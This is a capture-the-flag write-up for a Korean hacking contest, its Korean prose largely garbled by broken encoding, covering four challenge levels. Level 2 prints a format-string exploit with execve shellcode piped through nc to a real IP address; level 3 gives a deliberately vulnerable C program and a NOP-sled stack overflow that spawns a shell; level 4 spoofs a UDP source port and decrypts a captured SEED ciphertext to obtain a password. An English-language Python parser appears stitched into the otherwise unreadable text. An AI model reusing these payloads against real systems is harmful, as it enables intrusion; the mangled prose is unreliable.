ȳϼ? beist Դϴ.  3 ȸ HUST ŷ ȸ Դϴ.




- Level1 

level1.exe  ϸ ÷  ̻ ̷ ȭ   ˴ϴ.
׸ ÷ε port scanner    ǰ,  text  ϴ. 
Ƹ     ؼ   ϴ.

level1.exe  port scanner  Ǵ  , port scan   Ǿִ
 ˾Ҵµ ȸ Ȩ Ư  Ʈ   ҽϴ.

׸,  PC  bind ϴ port     level1.exe binary  
мϴ   ǵϰŶ ǴϿϴ.

hex editor  ( ultra editor  Ͽϴ.) exe   ͸
  ֽϴ.    pass  õ string  ˻ϱ ߴµ,
pass  õ Ͱ 3  ̴.

passwd=10125
passwd=65536
passwd=ejgkrl

ejgkrl  'ϱ'  ŸԴϴ.    ΰ ϶ ̾߱ . 
ΰ ϸ 75661 ε    õϸ   ˴ϴ.





- level2 

remote  Ʈ Դϴ. 2  Ʈ ĵغϱ 980 Ʈ 
ϴ.  ؼ     dump ȭ ݴϴ. %x  
 Ʈ Էϴϱ ּ  ϴ    ־ format string 
  ߽ϴ.

level2  ⺻ formatstring      ϸ ˴ϴ.

[ּ1] - [Dummy] - [ּ2] - [%8x%8x] - [integer] - [%n format] -
[integer] - [%n format] - [shellcode]                        

ּ1, 2  return address   ġԴϴ.  ڵ  
shellcode  ÷Ͽµ, shellcode   ġ dump ȭ 鼭  
ֽϴ. dump ȭ鿡  shellcode  ġ Ͽ return address  
 level2  shell    ֽϴ.

 ڵ Ʒ ϴ. ϴ ýۿ   ٸ ֽϴ.

(perl -e 'print "\xec\xfd\xff\xbfAAAA\xee\xfd\xff\xbf", "%8x"x2, 
"%64936d%n%49723d%n\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"';cat)|
nc 203.249.94.33 980 





- level3 

level3  Ϲ overflow Դϴ.  ̳ʸθ Ǵµ  ҽ 
  ϴ.


#include <stdio.h>
#include <string.h>   /* strcpy() was used without its header */

/* level3 target as the write-up presents it: the unbounded strcpy into
 * an 8-byte stack buffer and the printf(buf) format-string bug are the
 * intended defects of the challenge binary and are kept as-is. */
int main(int argc, char *argv[])
{
        char buf[8];

        if (argc < 2)
                return 1;     /* avoid dereferencing a missing argv[1] */
        strcpy(buf, argv[1]); /* no length check: stack buffer overflow */
        printf(buf);          /* user-controlled format string */
        return 0;
}


 level2  ٰ մϴ. level3  level3pw  suid  
پֱ  overflow  Ѵٸ ڴ level3pw    ֽϴ.

ȯ  Shellcode  ÷ argv[1]  ٽ  ȯ  Ű 
 ϰڽϴ.

ϴ ڵ :

\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80

[beist@beist hust]$ export BEIST=`perl -e 'print "\x90"x1000, "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
[beist@beist hust]$ ./level3 `perl -e 'print "\xfa\xf9\xff\xbf"x4'`
sh-2.05b$

⼭ ڵ տ set*uid(level3pw)    ϴ ڵ带 ߰Ѿ մϴ.
ŷ ȸ  ڷᰡ  level3pw  uid  Ȯ Ͽ ⿡ 
߽ϴ.





- level4 

level4  udp  Դϴ.  4  1337 port  udp Ʈ ֽϴ.
 α׷  ̸ udpserv Դϴ. client  udpserv  ͸ ϰ,
ٽ   31337 port  ޾ƾ մϴ. , client  udpserv   
 port bind  31337  ְ  ؾѴٴ ̾߱Դϴ.

level4 udpserv port - 1337
client port - 31337

̷ ·  ؾմϴ. client  port  31337  ߴ   ʽϴ.
nc  ̿ϸ  մϴ. nc  -p ɼ local port  Ƿ ؼ 
ִ  ֽϴ.

level4  Ʈ ־ Ŀǵ带  GET  AUTH  ֽϴ. GET Ŀǵ带 
 ̿Ͽ ϸ,

printf "GET" | nc -u -p 31337 level4 1337

level4  ȣȭ ȣ  ˴ϴ.   client   ʹ nc  -o 
ɼ ־ dump  ϰų ϸ   ֽϴ. Ǵ network sniffing  
  ֽϴ. 

ex) tcpdump  ̿ packet capture

02:13:58.961288 211-255-9-215.rev.krline.net.31337 > 203.249.94.26.1337: udp 3 (DF)
0x0000   4500 001f 868a 4000 4011 ac59 d3ff 09d7        E.....@.@..Y....
0x0010   cbf9 5e1a 7a69 0539 000b dd05 4745 54          ..^.zi.9....GET
02:13:58.972455 203.249.94.26.32772 > 211-255-9-215.rev.krline.net.31337: udp 32 (DF)
0x0000   4500 003c 0000 4000 2f11 43c7 cbf9 5e1a        E..<..@./.C...^.
0x0010   d3ff 09d7 8004 7a69 0028 36d7 c236 6117        ......zi.(6..6a.
0x0020   6fdb be36 629c fc01 547a 9e2b 997c c731        o..6b...Tz.+.|.1
0x0030   61f5 6f38 abde 05a7 285d 180b 

ŵ udp  data κ 32 ƮԴϴ. ü ŵ ũⰡ 60 Ʈ  
 28 Ʈ udp  header  Դϴ.  c236....180b  ȣȭ ȣ
Դϴ.
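The header arithmetic above (60 bytes on the wire, 28 bytes of IPv4 plus UDP headers, 32 bytes of data) can be checked mechanically rather than by counting hex groups by hand. The following Python is an added example, not code from the original write-up or from the contest: it parses the tcpdump -x output shown above (embedded here as its input), reads the IHL and UDP length fields from the packet instead of assuming 20 + 8, rejects a truncated dump, and returns each packet's UDP payload, so the bytes handed to the SEED decryption step are exactly what the server sent. The function names parse_hexdump, udp_payload and capture_payloads are my own.

```python
import re
import struct

# Both packets of the tcpdump capture shown above, copied from the page.
CAPTURE = """\
02:13:58.961288 211-255-9-215.rev.krline.net.31337 > 203.249.94.26.1337: udp 3 (DF)
0x0000   4500 001f 868a 4000 4011 ac59 d3ff 09d7        E.....@.@..Y....
0x0010   cbf9 5e1a 7a69 0539 000b dd05 4745 54          ..^.zi.9....GET
02:13:58.972455 203.249.94.26.32772 > 211-255-9-215.rev.krline.net.31337: udp 32 (DF)
0x0000   4500 003c 0000 4000 2f11 43c7 cbf9 5e1a        E..<..@./.C...^.
0x0010   d3ff 09d7 8004 7a69 0028 36d7 c236 6117        ......zi.(6..6a.
0x0020   6fdb be36 629c fc01 547a 9e2b 997c c731        o..6b...Tz.+.|.1
0x0030   61f5 6f38 abde 05a7 285d 180b
"""

IPPROTO_UDP = 17


def parse_hexdump(text):
    """Return a list of raw packets (bytes) from tcpdump -x style output.

    A hex line looks like '0x0010   d3ff 09d7 ...        <ascii>'. The offset,
    the hex column and the ASCII column are separated by runs of two or more
    spaces, so splitting on those keeps ASCII characters that happen to look
    like hex digits out of the byte stream. Offset 0x0000 starts a new packet;
    summary lines (timestamps) and blank lines are skipped.
    """
    packets = []
    for line in text.splitlines():
        parts = re.split(r"\s{2,}", line.strip())
        if len(parts) < 2 or not re.fullmatch(r"0x[0-9a-fA-F]+", parts[0]):
            continue
        if int(parts[0], 16) == 0:
            packets.append(bytearray())
        if not packets:
            raise ValueError("hex line before any 0x0000 offset")
        packets[-1] += bytes.fromhex(parts[1].replace(" ", ""))
    return [bytes(p) for p in packets]


def udp_payload(packet):
    """Strip the IPv4 and UDP headers; return (src_port, dst_port, payload).

    Header sizes come from the packet itself (IHL field, UDP length field),
    and both are checked against what was actually captured so a truncated
    dump raises instead of silently yielding a short ciphertext.
    """
    if len(packet) < 20 or packet[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (packet[0] & 0x0F) * 4
    total_length = struct.unpack("!H", packet[2:4])[0]
    if packet[9] != IPPROTO_UDP:
        raise ValueError("not a UDP packet")
    if total_length > len(packet) or ihl + 8 > total_length:
        raise ValueError("truncated capture")
    src_port, dst_port, udp_len, _checksum = struct.unpack(
        "!HHHH", packet[ihl:ihl + 8])
    if udp_len < 8 or ihl + udp_len > total_length:
        raise ValueError("bad UDP length field")
    return src_port, dst_port, packet[ihl + 8:ihl + udp_len]


def capture_payloads(text):
    """Parse a whole capture: [(src_port, dst_port, payload_hex), ...]."""
    return [(s, d, p.hex()) for s, d, p in map(udp_payload, parse_hexdump(text))]


if __name__ == "__main__":
    for src, dst, payload in capture_payloads(CAPTURE):
        print(f"{src} -> {dst}: {len(payload) // 2} bytes: {payload}")
```

Run on the capture above, the first packet decodes to the 3-byte "GET" sent from local port 31337 to 1337, and the second to the 32-byte ciphertext c2366117...285d180b that the SEED/OFBPAD step then decrypts; the UDP length field (0x0028 = 40) confirms 8 header bytes plus 32 data bytes.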

 ȣȭ ȣ SEED  ̿Ͽ ȣȭǾϴ. SEED ȣ key  ʿѵ
level4  Ʈ  key , ȣȭ SEED  ڿ ˷ְ ֽϴ. 
ڴ  key  ̿Ͽ ٽ ȣȭŰ ˴ϴ.

ȣȭ SEED  OFBPAD Դϴ.

Ʈ ־ key Դϴ.

12 34 56 78 9A BC DE F0 01 23 45 67 89 AB CD EF
10 DC 98 BA 76 54 32 FE 10 DC 98 BA 76 54 32 FE

 key  ̿Ͽ ȣȭ   ֽϴ. ȣȭ  ʽϴ. ȣȭ/ȣȭ
׽Ʈ   ִ SEED   ޾Ƽ ϸ    ֽϴ.

(http://beist.org/seed.zip  α׷ ÷ҽϴ. ̷ üũϽð ϼ.
  readme.txt  ϼ.)

key.dat Ͽ key  ð OFBPAD  ȣȭ ȣ ȣȭϽø ˴ϴ.
⼭ ȣȭ ȣ 

c236 6117 6fdb be36 629c fc01 547a 9e2b 
997c c731 61f5 6f38 abde 05a7 285d 180b 

Դϴ.   ȣȭϿ ȣ Ǯ 

9bab258d3dfe4422b3e092aae75b6dac

   ˴ϴ.  

AUTH/SERIAL/9bab258d3dfe4422b3e092aae75b6dac 

(AUTH SERIAL 9bab258d3dfe4422b3e092aae75b6dac ϼ ֽϴ.  س..)

   udp 1337   ٽ  Ͱ  ˴ϴ.   
OFBPAD  ȣȭ level4  ȣԴϴ.

   ȣȭ ϸ level4  н带   ְ,  н带 ̿Ͽ
level4 α ϸ index  ٲ  ֽϴ. (  κп ؼ 
 ߱  ڷḦ ÷     մϴ.)



׷ ̸  ġڽϴ.

